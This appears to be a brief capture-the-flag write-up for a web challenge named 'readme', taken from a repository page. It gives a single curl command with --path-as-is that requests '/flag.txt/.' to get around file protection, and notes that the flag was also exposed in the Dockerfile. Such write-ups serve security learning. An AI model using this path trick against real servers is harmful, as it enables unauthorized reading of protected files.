Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

readme

  • Category: Web
  • Score: 100/500
  • Solves: 978

Description

Try to read the flag.txt file.

Solution

curl --path-as-is 'http://localhost:80/flag.txt/.'

Unintended Solution 😭

The distribution file contains the flag in Dockerfile...